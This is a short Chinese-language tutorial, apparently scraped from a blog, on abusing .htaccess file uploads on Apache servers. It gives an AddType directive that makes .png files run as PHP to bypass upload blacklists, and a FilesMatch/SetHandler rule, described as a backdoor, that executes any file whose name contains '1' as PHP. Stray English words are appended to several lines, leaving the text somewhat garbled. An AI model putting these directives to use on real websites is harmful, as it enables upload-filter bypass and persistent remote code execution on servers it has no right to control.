.htaccess文件上傳利用

通常.htaccess能夠用來留後門和針對黑名單繞過php

建立一個txt寫入app

AddType  application/x-httpd-php    .png

打開另存爲網站

保存類型爲全部文件spa

上傳.htaccess 必須是網站根路徑 code

讓png解析爲php blog

2.留後門 能夠在.htaccess 加入php解析規則io

相似於把文件名包含1的解析成phpclass

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

123456.png  就會以php執行im

相關文章
相關標籤/搜索